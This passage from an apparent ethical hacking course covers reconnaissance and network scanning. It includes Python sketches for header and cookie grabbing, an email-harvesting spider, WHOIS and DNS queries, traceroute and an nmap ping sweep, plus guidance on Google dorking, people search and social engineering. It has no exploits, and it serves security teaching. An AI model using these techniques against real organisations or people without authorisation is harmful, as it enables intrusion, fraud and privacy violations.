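minimal sketch using only the Python standard library, pointed at one of the public vulnweb.com
demo hosts:

import http.client

# testphp.vulnweb.com is a deliberately vulnerable demo site intended for testing tools
conn = http.client.HTTPConnection("testphp.vulnweb.com", 80, timeout=10)
conn.request("HEAD", "/")
response = conn.getresponse()

# The Server and X-Powered-By headers often reveal the web server and platform in use
print("Status:", response.status)
print("Server:", response.getheader("Server"))
print("X-Powered-By:", response.getheader("X-Powered-By"))
conn.close()

Keep in mind that these headers can be removed or faked, so treat them as hints, not proof.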

Collect information on target location

In this step you have to be careful. If you found a physical address of the company, you can look
it up on maps to get an idea of the visual environment and what the company looks like from the
outside. However, if you are relying on the physical location of the server's IP address, I would
advise you not to try to locate it on the maps, because it is very likely that the company's
engineers hosted the server with a hosting company or directly in the cloud, so the location would
be that of the data center where the application is hosted, which may well be thousands of
kilometers from the actual location of the company.

Useful tools to visualize the location:


 Wikimapia
 Google Maps
 Bing Maps
 Yahoo Maps
 OpenStreetMap
 Yandex Maps

People search: social networking sites, people search services

Social networking sites are a great source of personal and organizational information.
Information about an individual can be found on various people-search websites; a people
search usually returns the following information about a person or organization:

 Residential addresses and email addresses


 Contact numbers and date of birth
 Photos and profiles of social networks
 Blog URL
 Satellite images of private residences
 Upcoming projects and operating environment

Interesting services:

1. PeopleSmart
2. Facebook Finder
3. Google

Get finance and employment information

Financial services offer valuable information about both large companies and small startups that
you may have to audit; you will find the company's market cap, its stock, the company
profile, information about its competition, etc.

Interesting services:

1. Google Finance
2. Yahoo! Finance

The job openings that companies post reveal their structure and possibly the technologies they
use in their infrastructure, so you can research job listing pages as well.

Website Recognition
It is possible for an attacker to build a detailed map of the structure and architecture of a website
without activating the IDS or without raising suspicion of the system administrator. It can be
achieved with the help of sophisticated footprinting tools or simply with the basic tools that
come with the operating system, such as Telnet and a browser.

With online tools you can collect information about the website such as IP address, registered
name and address of the domain owner, domain name, host of the site, details of the operating
system, etc. But this tool may not provide all these details for each site. In such cases, you must
navigate through the destination website.

Navigation through the destination website will provide you with the following information:

 Software used and its version: you can find not only the software in use but also the
version easily on the website based on standard software, you can also find a CMS
behind it.
 Operating system used: generally the operating system can also be determined
 Sub-directories and parameters: can reveal the subdirectories and parameters by
making a note of all the URLs while browsing the destination website.
 File name, path, database field name or query: you must scan everything after a query
that looks like a file name, path, field name of the database or query to verify if it offers
opportunities for SQL injection.
 Scripting Platform: with the help of script file name extensions such as .php, .asp, .jsp,
etc. You can easily determine the script platform used by the target website.
 Contact details and CMS details: contact pages generally provide details such as
names, phone numbers, email addresses and locations of administrators or support
persons. You can use these details to perform a social engineering attack.

Tools of interest:

1. Burp Suite Scanner


2. Wappalyzer
3. ZAP Proxy
4. Firebug

Browse the source code in HTML and Cookies

The HTML source code is a valuable resource that is publicly available to us, and we should
take advantage of it: it may contain valuable information such as details about the
programmer, the types of libraries the website calls, forgotten comments that reveal interesting
things, the internal structure of the site, etc.

We can also examine the cookies stored in our browser, or the site's cookie policy, to identify
software that the target uses.
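
A quick way to review this material is to fetch a page and pull out the HTML comments and the
cookies the server sets. The sketch below uses the third-party requests package (an assumption:
it must be installed separately) against one of the public vulnweb.com demo hosts; any site you
are authorized to test would do.

import re
import requests

URL = "http://testphp.vulnweb.com/"  # demo target; replace with a site you may test

resp = requests.get(URL, timeout=15)

# HTML comments sometimes contain developer notes, internal paths or version hints
for comment in re.findall(r"<!--(.*?)-->", resp.text, flags=re.DOTALL):
    print("COMMENT:", comment.strip()[:100])

# Cookie names can reveal the framework or CMS behind the site (e.g. PHPSESSID, JSESSIONID)
for name, value in resp.cookies.items():
    print("COOKIE:", name, "=", value[:40])

# The Server header complements what Netcraft or Shodan reported
print("Server header:", resp.headers.get("Server"))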
Use web spiders

Web spiders perform automated searches on the destination website and collect specific
information, such as names of employees, email addresses, etc.

Attackers use the information gathered to perform further footprinting and social engineering attacks; a minimal spider sketch follows the tool list below.

Tools:

1. GSA Email Spider


2. Web Data Extractor
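
As a rough idea of what such a spider does, the sketch below downloads a starting page, harvests
anything that looks like an email address and follows a few same-site links. It is deliberately tiny
compared with the tools above, uses a crude regex instead of a real HTML parser, and assumes
the requests package is available.

import re
from urllib.parse import urljoin, urlparse
import requests

START = "http://testphp.vulnweb.com/"   # demo target; crawl only sites you are allowed to test
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")
LINK_RE = re.compile(r'href=["\'](.*?)["\']', re.IGNORECASE)

to_visit, seen, emails = [START], set(), set()
domain = urlparse(START).netloc

while to_visit and len(seen) < 10:               # keep the crawl very small
    url = to_visit.pop()
    if url in seen:
        continue
    seen.add(url)
    try:
        html = requests.get(url, timeout=10).text
    except requests.RequestException:
        continue
    emails.update(EMAIL_RE.findall(html))
    for link in LINK_RE.findall(html):
        absolute = urljoin(url, link)
        if urlparse(absolute).netloc == domain:  # stay on the target site
            to_visit.append(absolute)

print("Pages visited:", len(seen))
print("Emails found:", emails)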

Mirroring of the website

Creating a complete copy of a website on the local system allows attackers to browse the website
offline; it also helps to find the directory structure and other valuable information from the
duplicated copy without sending multiple requests to the web server. Website mirroring tools
allow you to download a website to a local directory, recursively recreating all directories,
HTML, images, Flash, videos and other files from the server on your computer.

Tools:

1. HTTrack Website Copier


2. Offline browser SurfOffline
3. BlackWidow

Acknowledgment of Emails

Tracking of email communications

Email tracking is a method that helps you monitor and track the emails of a particular user. This
type of tracking is possible through digitally time-stamped records that reveal the time and date
at which the recipient received or opened a particular email. Many email tracking tools are
available on the market, with which you can collect information such as IP addresses, mail
servers and the service provider from which the email was sent.

Through the use of tracking tools you can collect the following information about the
victim:
 Geolocation: estimates and shows the location of the recipient on a map, and can even
calculate the distance from your own location.
 Duration of reading: the length of time the recipient spends reading the email sent by
the sender.
 Proxy detection: provides information about the type of server used by the recipient.
 Links: allows you to verify if the links sent to the recipient through the email have been
reviewed or not.
 Operating System: this reveals information about the type of operating system used by
the recipient. The attacker can use this information to launch an attack by finding gaps in
that particular operating system.
 Email forwarding: this can easily determine whether the recipient forwarded the email
you sent to another person.

Interesting tools:

1. G-Lock Analytics
2. Yesware
3. Trace-Email
4. Zendio

Get information from headers

An email header is the information that travels with each email. It contains the details of the
sender, the routing information, the date, the subject and the recipient. The process of viewing
the email header varies between email programs.

The email header usually contains the following:

 Sender's mail server
 Date and time the message was received by the originator's email servers
 Authentication system used by the sender's mail server
 Date and time the message was sent
 Full name of the sender
 Sender's IP address
 The address from which the message was sent

The attacker can trace and collect all this information by performing a detailed analysis of the
full email header.
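
Python's standard email module can parse a raw header block so you can read these fields
programmatically. A minimal sketch, using a made-up header purely as sample input (the
addresses, host names and IDs are invented for the example):

from email import message_from_string

# Hypothetical raw headers, e.g. copied from "Show original" in a mail client
raw_headers = """Received: from mail.example.org (mail.example.org [203.0.113.10])
    by mx.victim.example (Postfix) with ESMTP id ABC123
    for <user@victim.example>; Mon, 29 Jan 2018 10:15:02 +0000
From: Alice Example <alice@example.org>
To: user@victim.example
Subject: Quarterly report
Date: Mon, 29 Jan 2018 10:14:55 +0000
Message-ID: <20180129101455.1234@example.org>

"""

msg = message_from_string(raw_headers)
print("From:   ", msg["From"])
print("Subject:", msg["Subject"])
print("Date:   ", msg["Date"])
# Received headers are read from bottom to top to reconstruct the path the message took
for hop in msg.get_all("Received", []):
    print("Hop:    ", " ".join(hop.split()))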

Recognition: competitive intelligence


Several tools are available in the market for competitive intelligence gathering purposes.

Competitive intelligence is defined as the acquisition, using the Internet, of information about a
company's products, competitors and technologies. Competitive intelligence is not just about
analyzing competitors, but also about analyzing their products, customers, suppliers, etc.,
everything that impacts the organization. It is non-intrusive and subtle in nature compared to the
direct theft of intellectual property carried out through hacking or industrial espionage, it focuses
mainly on the external business environment, and it gathers information ethically and legally
instead of compiling it covertly. According to CI professionals, if the intelligence gathered is not
useful, then it is not called intelligence.

Competitive intelligence is done to determine:

1. What competitors are doing
2. How competitors are positioning their products and services

Sources of competitive intelligence:

1. Business websites and job advertisements
2. Search engines, Internet and online databases
3. Press releases and annual reports
4. Commercial magazines, conferences and newsletters
5. Patents and trademarks
6. Social engineering of employees
7. Product catalogs and points of sale
8. Analyst and regulatory reports
9. Interviews with clients and suppliers

Competitive intelligence can be carried out by employing people to search for information or
using a commercial data service, which implies a lower cost than employing personnel to do the
same.

Competitive intelligence: when did this company start? How did it develop?

Collecting documents and records of competition helps improve productivity and profitability,
and stimulates growth. Help determine the answers to the following:

 When did it start?: through competitive intelligence, the history of a company can be
gathered, as when a particular company was established. Sometimes, you can also gather
crucial information that is generally not available to others.
 How did it develop?: it is very beneficial to know exactly how a particular company
developed: you can learn the different strategies used by the company, its advertising
policy, its customer relationship management, etc.
 Who directs it?: this information helps a company to know the details of the leader
(responsible for making decisions) of the company.
 Where is it?: the location of the company and the information related to the various
branches and their operations can be collected through competitive intelligence.
You can use this information collected through competitive intelligence to build a hacking
strategy. The following are information resource sites that help users obtain competitive
intelligence:

1. EDGAR: all US companies must submit registration statements, periodic reports and
other forms electronically through EDGAR.
2. Hoovers: is a commercial research company that provides complete details about
companies and industries around the world. Hoovers provides patented information
related to the business through the Internet, data feeds, wireless devices and co-branding
agreements with other online services.

Traffic monitoring of the target company's website

The attacker uses website traffic tracking tools, such as web-stat, Alexa, Monitis, etc., to gather
information about the target company.

Information you get:

 Total visitors
 Page views
 Bounce Rate
 Live visitor map
 Ranking of the site

Traffic monitoring helps gather information about the target's client base that helps attackers
disguise themselves as a customer and launch social engineering attacks against the target.

Tools:

1. Alexa

Track target's online reputation

Online reputation management (ORM) is the process of monitoring a company's reputation on
the Internet and adopting certain measures to minimize negative search results and thus improve
the brand's reputation.

An attacker uses the ORM tracking tools to:

 Follow the company's online reputation


 Collect search engine ranking information from the company
 Get email notifications when a company is mentioned online
 Follow conversations
 Obtain social news about the target organization
Tools:

1. Rankur
2. Reputation Defender

Recognition: Advanced Google Hacking Techniques


Google hacking refers to the art of creating complex search engine queries. If you can build the
appropriate queries, you can retrieve valuable data about a target company from Google's search
results. Through Google hacking, an attacker tries to find websites that are vulnerable to
numerous exploits and vulnerabilities. This can be achieved with the help of the Google Hacking
Database (GHDB), a database of queries to identify confidential data. Using Google operators,
attackers locate specific text strings, such as specific versions of vulnerable web applications.

Some of the popular Google operators include:

 (site:), the site operator in google helps find only pages that belong to a specific URL.
 (allinurl:), this operator finds the necessary pages or websites when rewriting the results
that contain all the terms of the query.
 (inurl) This will restrict the results only to websites or pages that contain the query terms
that you have specified in the URL of the website.
 (allintitle) restricts the results to only web pages that contain all the query terms you
have specified.
 (intitle:) restricts the results only to web pages that contain the query term you have
specified. It will show only websites that mention the query term that you have used.
 (inanchor:) restricts the results to pages that contain the query term you specified in the
anchor text in the links to the page.
 (allinanchor :) restricts the results to the page that contains all the query terms that you
specify in the link text in the link
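
To make these operators concrete, here are a couple of illustrative queries in the same spirit as
the thermostat example earlier in this module; example.com is a placeholder for a domain you
are authorized to assess, and the results will of course vary:

site:example.com intitle:"index of" "parent directory"
site:example.com inurl:admin intitle:login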

As we saw earlier in this module of the computer security course, in Finding thermostat control
panels with Google, search engines have great power to surface sensitive information exposed
through human carelessness. Google hacking is a factor that you must take into account when
auditing computer networks.

What can a hacker do with Google?

If the target website is vulnerable to Google Hacking, the attacker can find the following with the
help of Google Hacking Database queries:

 Error messages that contain confidential information


 Files that contain passwords
 Sensitive directories
 Pages that contain login portals
 Pages that contain network or vulnerability data
 Server advisories and vulnerabilities

The best website for finding Google operators oriented to ethical hacking is:
https://www.exploit-db.com/google-hacking-database/

Recognition: WHOIS Databases


WHOIS is a query and response protocol used to query databases that store the registered users
or assignees of an Internet resource, such as a domain name, a block of IP addresses or an
autonomous system. The WHOIS databases are maintained by the regional Internet registries and
contain the personal information of domain owners. They keep a record, called a lookup table,
that contains all the information associated with a particular network, domain and host. Anyone
can connect to and query these servers to obtain information about particular networks, domains
and hosts.

An attacker can send a query to the appropriate WHOIS server to obtain information about
the target domain name, the contact details of its owner, the expiration date, the creation date,
etc. The WHOIS server will respond to the query with the respective information. The attacker
can then use this information to create a map of the organization's network, deceive the domain
owners with social engineering once he or she has the contact details, and then obtain the
internal details of the network.

An example WHOIS lookup for vulnweb.com can be seen at https://who.is/whois/vulnweb.com.
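
You can also speak the WHOIS protocol directly: it is a plain-text query sent to TCP port 43 of a
WHOIS server. A minimal sketch using only the Python standard library (the server shown
handles .com domains; other TLDs are served by other registries):

import socket

def whois_query(domain, server="whois.verisign-grs.com", port=43):
    """Send a raw WHOIS query and return the text response."""
    with socket.create_connection((server, port), timeout=10) as sock:
        sock.sendall((domain + "\r\n").encode())
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")

print(whois_query("vulnweb.com"))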

Recognition: Collect DNS information


DNS recognition allows you to obtain information about the data in the DNS zone. This
information from the DNS zone includes DNS domain names, computer name, IP addresses and
much more about a particular network. The attacker performs DNS recognition on the target
network to determine the key hosts on the network and then performs social engineering attacks
to gather more information.

DNS recognition can be done using DNS interrogation tools such as dnsstuff.com. It is possible
to extract DNS information about IP addresses, mail server records, DNS lookups, WHOIS
lookups, etc. If you want information about a target company, it is possible to extract its range of
IP addresses using the IP routing lookup on DNSstuff. If the target network allows unknown,
unauthorized users to transfer DNS zone data, then it is easy for you to obtain the DNS
information with the help of a DNS interrogation tool.

Once you send the query using the DNS query tool to the DNS server, the server will respond
with a registration structure that contains information about the target DNS. DNS records
provide important information about the location and type of servers.
For example, you can consult vulnweb.com
(http://www.dnsstuff.com/tools#dnsReport|type=domain&&value=vulnweb.com) and review the
record types returned:

 A: points to the host's IP address
 MX: points to the domain's mail server
 NS: points to the host's name server
 CNAME: canonical name, allows aliases for a host
 SOA: indicates the authority for the domain
 SRV: service records
 PTR: maps an IP address to a hostname
 RP: responsible person
 HINFO: host information record, including the CPU type and operating system

Tools:

 dnsstuff.com
 network-tools.com
 DNSWatch
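
If you prefer to gather these records from a script, the dnspython library (an external dependency
that must be installed, e.g. with pip install dnspython) can query individual record types directly.
A small sketch, assuming a recent dnspython version where dns.resolver.resolve is available:

import dns.resolver

DOMAIN = "vulnweb.com"

# Query a few common record types; a missing record simply raises NoAnswer/NXDOMAIN
for record_type in ("A", "MX", "NS", "TXT"):
    try:
        answers = dns.resolver.resolve(DOMAIN, record_type)
    except (dns.resolver.NoAnswer, dns.resolver.NXDOMAIN):
        print(record_type, "-> no record")
        continue
    for rdata in answers:
        print(record_type, "->", rdata.to_text())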

Recognition: Locate the range of the Network

To carry out the recognition of the network, you must gather basic and important information
about the target organization, such as what the organization does, who it works for and what type
of work they do. The answers to these questions give you an idea about the internal structure of
the target network.

After collecting the aforementioned information, an attacker can proceed to look up the network
range of the target system. He or she can obtain more detailed information from the appropriate
regional registry database with respect to the IP assignment and the nature of the assignment. An
attacker can also determine the subnet mask of the domain. He or she can also trace the route
between the system and the destination system. The two popular traceroute tools are NeoTrace
and Visual Route.

The network range gives you an idea of what the network is like, what network machines are
active and helps identify the topology of the network, the access control device and the operating
system used in the target network. To find the network range of the target network, enter the IP
address of the server (collected during the WHOIS footprinting) in the ARIN WHOIS data
search tool, or go to the ARIN website (https://www.arin.net/) and enter the server's IP in the
WHOIS search box. You will obtain the network range of the target network. If the DNS servers
are not configured correctly, the attacker has a good chance of obtaining a list of internal
machines from the server. Also, sometimes, if an attacker traces a route to a machine, he or she
can get the internal IP address of the gateway, which could be useful.
Websites of the Regional Internet Registrars (RIR):

1. American Registry for Internet Numbers (ARIN)


2. Latin American and Caribbean Internet Address Registry (LACNIC)
3. RIPE Network Coordination Center (RIPE NCC)
4. African Network Information Center (AfriNIC)
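
The regional registries also expose this information over RDAP, a JSON-based successor to
WHOIS that is convenient to query from a script. The sketch below asks ARIN's public RDAP
service about an IP address; the endpoint URL and response fields reflect my understanding of
the standard RDAP service, and the other registries listed above offer equivalent endpoints. It
assumes the requests package is installed.

import requests

IP = "8.8.8.8"  # example address; replace with the server IP you collected earlier

resp = requests.get("https://rdap.arin.net/registry/ip/" + IP, timeout=15)
resp.raise_for_status()
data = resp.json()

# A successful answer describes the network block the address belongs to
print("Network name:", data.get("name"))
print("Range:", data.get("startAddress"), "-", data.get("endAddress"))
print("Type:", data.get("type"))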

Map network path

It is necessary to find the route to the destination host in order to test man-in-the-middle and
other related attacks. Therefore, you must find the path to the destination host on the network.
This can be achieved with the help of the traceroute utility provided with most operating systems.
It allows you to trace the route through which packets travel to the destination host on the network.

Traceroute uses the ICMP protocol concept and the TTL (Time to Live) field of the IP header to
find the route of the destination host on the network.

The traceroute utility can detail the path of IP packets between two systems. It can track the
number of routers the packets travel through, the round-trip time in transit between routers, and,
if the routers have DNS entries, the names of the routers, their network membership and their
geographical location. It works by exploiting a feature of the Internet Protocol called Time To
Live (TTL). The TTL field is interpreted as the maximum number of routers a packet may
transit. Each router that handles a packet decrements the TTL field by one; when the count
reaches zero, the packet is discarded and an error message is transmitted to the originator of the
packet.

Traceroute sends a packet destined for the specified destination with the TTL field set to one.
The first router on the route receives the packet, decrements the TTL value by one, and since the
resulting TTL value is 0, discards the packet and sends a message back to the originating host to
inform it that the packet has been discarded. Traceroute records the IP address and DNS name of
that router and then sends another packet with a TTL value of two. This packet passes through
the first router and expires at the next router on the route; this second router also sends an error
message back to the source host. Traceroute continues doing this, recording the name of each
router, until a packet finally arrives at the destination host or until it decides that the host is
unreachable. In the process, it records the time each packet takes to travel back and forth to each
router. Finally, when it reaches the destination, the normal ICMP ping response is sent to the
sender. Therefore, this utility helps to reveal the IP addresses of the intermediate hops on the
route to the destination host from the source.
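
The same TTL mechanism can be reproduced in a few lines of Python. The sketch below is a
classic minimal traceroute for UNIX-like systems: it needs root privileges because of the raw
ICMP socket, and in practice the system traceroute command or Scapy is more convenient; it is
shown only to make the mechanism described above tangible.

import socket

DEST = "vulnweb.com"   # target host
PORT = 33434           # high UDP port traditionally used by traceroute
MAX_HOPS = 20

dest_addr = socket.gethostbyname(DEST)
for ttl in range(1, MAX_HOPS + 1):
    recv_sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.getprotobyname("icmp"))
    send_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.getprotobyname("udp"))
    send_sock.setsockopt(socket.IPPROTO_IP, socket.IP_TTL, ttl)   # the key step: expire at hop N
    recv_sock.settimeout(2.0)
    recv_sock.bind(("", PORT))
    send_sock.sendto(b"", (dest_addr, PORT))
    try:
        _, addr = recv_sock.recvfrom(512)   # ICMP "time exceeded" from the router at this hop
        hop = addr[0]
    except socket.timeout:
        hop = "*"
    finally:
        send_sock.close()
        recv_sock.close()
    print(ttl, hop)
    if hop == dest_addr:                    # destination reached (ICMP "port unreachable")
        break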
In addition to the operating systems' command-line utilities, there are tools that map the network
with attractive graphical interfaces:

1. GEO Spider
2. 3D Tracerouter
3. McAfee Trout
4. VisualRoute

Recognition: Obtain information through Social Engineering

Social engineering is an entirely social, non-technical process in which an attacker deceives a
person and obtains confidential information about the target in such a way that the target is not
aware that someone is stealing their trusted information. The attacker plays an astute game with
the goal of obtaining confidential information, taking advantage of people's helpful nature and
their tendency to give out confidential information.

To perform social engineering, you first need to gain the trust of an authorized user and then trick
them into revealing confidential information. The basic goal of social engineering is to obtain the
required confidential information and then use that information for hacking attempts, such as
obtaining unauthorized access to the system, identity, industrial espionage, network intrusion,
committing fraud, etc. Information obtained through social engineering can include credit card
details, social security numbers, user names and passwords, other personal information,
operating systems and software versions, IP addresses, server names, design information of
network and much more. Social engineers use this information to hack a system or commit fraud.

 Eavesdropping: the unauthorized listening to conversations or reading of messages; the
illegal interception of any form of communication, whether audio, video or written.

 Shoulder surfing: is a technique, where attackers secretly observe the target to obtain
critical information, the attackers collect information such as passwords, personal
identification number, credit card information, etc.
 Dumpster diving: search for treasures in someone else's trash, it involves the collection
of telephone bills, contact information, information related to operations, etc. of the target
company's trash bins, printer trash bins, user's table for sticky notes, etc.

Important Tools for Recognition


1. Maltego
It is a program that can be used to determine relationships and real-world links between people,
groups of people (social networks), companies, organizations, websites, Internet infrastructure,
phrases, documents and files.

2. Recon-ng

It is a web recognition framework with independent modules, database interaction,
built-in convenience functions, interactive help and command completion, providing an
environment in which open-source, web-based recognition can be performed.

3. FOCA

It is a tool used primarily to find metadata and hidden information in the documents it
scans; with it, it is possible to perform multiple attack and analysis techniques such as
metadata extraction, network analysis, DNS lookups, proxy searches, fingerprinting, searches for
open directories, etc.

Countermeasures to Recognition
Below I will give you a list of possible countermeasures to this hacking technique:

 Restrict employees' access to social networking sites from the organization's network
 Configure web servers to avoid leaks of information
 Educate employees to use pseudonyms in blogs, groups and forums
 Do not reveal critical information in press releases, annual reports, product catalogs, etc.
 Limit the amount of information you are publishing on the website or the Internet
 Use footprinting techniques to discover and remove any sensitive information that is publicly
available
 Prevent search engines from caching web pages, and use anonymous registration services
 Enforce security policies to regulate information that employees can disclose to third
parties
 Separate internal and external DNS or use split DNS, restrict zone transfer to authorized
servers
 Disable directory listings on web servers
 Educate employees on various tricks and risks of social engineering
 Opt for privacy services in the Whois search database
 Avoid cross-linking at the domain level for critical assets
 Encrypt and password protect sensitive information
This module ends here; I hope you have been able to learn the objectives of this module. A lot of
effort goes into this course and it is free, so I would like you to share it on your social networks or hacking
forums so that more people see it. This course will continue until it reaches at least 20 modules
and will become more advanced; you can subscribe if you want to follow the progress of the course,
and every 7 days an email is sent summarizing everything that happens on the blog.

Practice: Ethical Hacking Course - Practice 2 - How to recognize a goal

3 February 2018

Ethical Hacking Course - Module 3 - Network Scanning
Ethical Hacking Course, Computer Security

If you already saw the previous module of this ethical hacking course, which dealt with
recognition of the potential objective, this is the next step in profiling a target: actively and
completely scanning its environment. In this phase the target can easily notice that someone is
auditing it, and it is very difficult to remain stealthy, which is why it is called active: to obtain
more vital information from the system you need to probe it directly, and you cannot gather it the
way it is done in passive recognition, where external sources are used rather than the system
itself. Without further ado, we are going to start module 3 of the free ethical hacking course.

Full course: en.gburu.net/hack, here you will find all the topics of this free ethical hacking
course, in one place.

Responsibility:
This ethical hacking course is aimed at educational purposes to improve your computer security
skills to plan and design safer networks, does not encourage illegal activities in systems or
networks of third parties; if you commit an illicit activity in a system or network, you will do so at
your own risk. If you want to practice and improve your skills in ethical hacking, do it under
systems where you have a legal permit or are yours, I recommend using images of operating
systems installed in virtual machines in a controlled environment.

Agenda: Module 3 - Network Scanning

 Objectives of module 3
 Introduction to the scanning of Computer Networks
 Network Scanning Targets
 Search for living systems
 Ping scan with Zenmap
 Ping sweep with Zenmap
 Interesting tools for the ping sweep
 Search for open ports on a computer network
 Understand what the Three-Way Handshake is
 Establish a TCP connection
o Flags in a TCP communication
 IPV6 Scan
 Frequent techniques used to scan computer networks
 TCP Connect / Full Open Scan
 Stealth Scan
 Xmas Scan
 Reverse TCP flag scanning
 ACK flag probe scan
 IDLE/IPID header scan
 Scan to UDP ports
o IDLE Scan
o Countermeasures for port scanning
 Scanning ports with IDS evasion
 Scans with fragmented IP packets
 Source Routing
 SYN/FIN scan using IP fragments
 Firewall
 Banner Grabbing
 Active Banner Grabbing
 Passive Banner Grabbing
 Why is Banner Grabbing important?
 Interesting tools
 Countermeasures for Banner Grabbing
 Vulnerability Analysis
 Tool: Nessus
 Tool: GFI LanGuard
 Tool: Qualys FreeScan
 Network diagram drawings
o Tool: Network Topology Mapper
 What is a Proxy server?
 How does a proxy server work?
 Why do hackers use a proxy server?
 Examples of using proxies in computer attacks
 Proxy chaining (chaining of proxies)
 Tool: Tor
 Anonymizers
 Why use an anonymizer?
 Tool: Tails
 HTTP tunneling technique
o Countermeasures to the HTTP tunnel
o Tunneling tools in HTTP
 IP Spoofing
 Detect IP spoofing: direct TTL probes
 Detect IP spoofing: IP identification number
 Detect IP spoofing: TCP flow control method
 Countermeasures to IP spoofing
 The importance of network scanning in Pentesting

Objectives of Module 3
Once an attacker identifies his target system and performs initial recognition, as explained in the
previous module dealing with recognition of objectives, the attacker concentrates on obtaining a
mode of entry to the target system. It should be noted that scanning is not limited to intrusion
only. It can be a form of extended recognition in which the attacker learns more about its
objective, such as the operating system used, the services running on the systems, any
configuration lapses that can be identified, potentially exploitable vulnerabilities, and so on. The
attacker can then create a strategy for his attack, taking into account all the information collected
in recognition of his objective and then scanning his entire computer network.

In this module of this computer security course you are expected to have a conceptual idea of the
following:

 Overview of network scanning
 Use of Proxies for attacks
 Proxy chain
 Check of living systems
 HTTP tunneling techniques
 Scanning techniques
 SSH tunnels
 IDS evasion techniques
 Anonymizers
 Banner Grabbing
 Spoofing IP Detection Techniques
 Vulnerability scan
 Drawings of network diagrams
 Countermeasures for network scanning
 Scanning of networks in the Pentesting
Introduction to the scanning of Computer Networks
As we already mentioned, recognition is the first phase of hacking in which
the attacker obtains relevant information about a potential target. Recognition alone is not
enough to hack, since only the most important information about the objective will be collected
here. You can use this primordial information in the next phase to gather many more details
about the goal. The process of collecting additional details about the objective using highly
complex and aggressive recognition techniques is called scanning.

The idea is to discover exploitable communication channels, scan as many systems as possible
and track those that are receptive or useful for hacking. In the scanning phase, you can find
several ways to intrude on the target system. You can also discover more about the target system,
such as what operating system is used, what services are running, and if there are configuration
lapses in the target system. Depending on the facts you collect, you can form a strategy to launch
an attack, the more information the attacker or pentester has on the target and its computing
environment, the more likely it is to compromise the system.

The scan can usually be divided into the 3 most important parts:

 IP Scan: complete information about the IP of the target
 Port scanning: seeks to obtain as much information as possible about the ports, whether
they are open and what service is occupying each one.
 Vulnerability scanning: based on the services running on the open ports,
vulnerabilities are searched for in them.

From another perspective, the access points that are most dangerous in any house are the doors
and windows. These are usually the points of vulnerability of a house because of its relatively
easy accessibility. When it comes to computer systems and networks, ports are the doors and
windows of the system that an intruder uses to gain access. The more ports that are open, the
more possible access points and vulnerabilities there are; the fewer ports that are open, the more secure the system
will be. This is simply a general rule. In some cases a system has only 2 open ports but runs
services that are 10 years old, for which several vulnerabilities and exploits have already been
published, so the general rule does not always hold.

Network scanning is one of the most important phases of gathering information about the goal.
During the network scanning process, you can collect information about specific IP addresses
that can be accessed through the Internet, the operating systems of your targets, the architecture
of the system, and the services that run on each computer. In addition, the attacker also gathers
details about the networks and their individual host systems.

Objectives of the Network scan
If you have a lot of information about a target organization, there are
greater opportunities for you to find possible vulnerabilities in the organization's networks and
computer systems and, consequently, to obtain unauthorized access to its network.

Before launching the attack, the attacker observes and analyzes the target network from different
perspectives performing different types of recognition. How to perform the scan and what type
of information should be achieved during the scanning process depends completely on the
hacker's point of view. There may be many objectives to perform the scan, but here we will
discuss the most common objectives encountered during this phase of hacking:

 Discover live hosts: IP address and open ports of live hosts running on the network.
 Discover open ports: open ports are the best means to enter a system or network. You
can find simple ways to access the network of the target organization by discovering open
ports in your network.
 Discovery of operating systems and target system architecture: this is also known as
fingerprinting. Here the attacker will try to launch the attack depending on the
vulnerabilities of the operating system.
 Identification of vulnerabilities and threats: vulnerabilities and threats are the security
risks present in any system. It can endanger the system or the network by exploiting these
vulnerabilities and threats.
 Detect the associated network service of each port

Search for living systems
The term "live systems" refers to any device connected to the network that, when we
communicate with it, sends us a response, that is, it returns a reply packet.

All the required information about a system can be collected by sending ICMP packets. Since
ICMP does not have a port abstraction, this can not be considered a case of port scanning.

The Internet Control Message Protocol (ICMP) is the sub-protocol for error control and
notification of the Internet Protocol (IP). As such, it is used to send error messages, indicating
for example that a router or host cannot be located. It can also be used to transmit ICMP Query
messages. ICMP differs in purpose from TCP and UDP since it is not generally used directly by
user applications on the network. The only exceptions are the ping and traceroute tools, which
send ICMP Echo Request messages (and receive Echo Reply messages) to determine whether a host is
available, the time it takes packets to travel to and from that host, and the number of hosts
through which they pass.

ICMP Query
The ICMPquery or ICMPush UNIX tools can be used to request the time on the system (to find
out what time zone the system is located in) by sending an ICMP message of type 13
(TIMESTAMP). The network mask of a particular system can also be determined with ICMP
messages of type 17 (ADDRESS MASK REQUEST). After finding the network mask of a
network card, all subnets in use can be determined. With information about the subnets,
you can target only a specific subnet and avoid hitting the broadcast addresses.
Ping scan with Zenmap

Nmap is a tool that can be used for ping scans, also known as host discovery. Using this tool you
can determine which hosts are live on a network. It performs ping scans by sending ICMP ECHO requests
to all hosts on the network; if a host is live, it returns an ICMP ECHO reply. This scan
is useful for locating active devices or for determining whether ICMP is passing through a firewall. We will see
more of this in the practice of this module, in this case using the graphical interface of
Nmap called Zenmap.
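If you prefer the command line, the same ping scan can be driven from a small Python script. This is only a sketch, assuming nmap is installed and that 192.168.1.0/24 is a hypothetical network you are authorized to scan; the -sn option tells nmap to do host discovery only, without scanning ports:

import subprocess

result = subprocess.run(
    ["nmap", "-sn", "192.168.1.0/24"],
    capture_output=True, text=True, check=True
)
print(result.stdout)   # lists the hosts that answered the discovery probes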

In the practice of module 3 of the computer security course, we will see more in depth the
scanning of networks, simulating real environments.

Ping Sweep

The name is its best description: when you have a broom in your hands, you try to sweep the
dirt in a certain area (this does not apply to Harry Potter...). A ping sweep (also known as an
ICMP sweep) is a basic network scanning technique used to determine which IP addresses in a range are
assigned to live hosts (computers). While a single ping tells the user whether a specified host
exists on the network, a ping sweep consists of ICMP ECHO requests sent to multiple hosts.

ICMP ECHO Reply

If a host is active, it returns an ICMP ECHO reply. Ping sweeps are among the oldest and
slowest methods used to scan a network. This utility is distributed on almost all platforms and acts as
a roll call for systems: a system that is active on the network answers the ping query sent
by another system.

TCP/IP Packet

To understand ping, you must understand the TCP/IP packet. When a system is pinged, a single
packet is sent over the network to a specific IP address. This packet contains
64 bytes, that is, 56 bytes of data and 8 bytes of protocol header information. The sender then
waits for a return packet from the destination system. A good return packet is expected only
when the connections are good and when the target system is active. Ping also determines the
number of hops between the two computers and the round-trip time, that is, the total time a
packet takes to complete the trip. Ping can also be used to resolve host names: if the
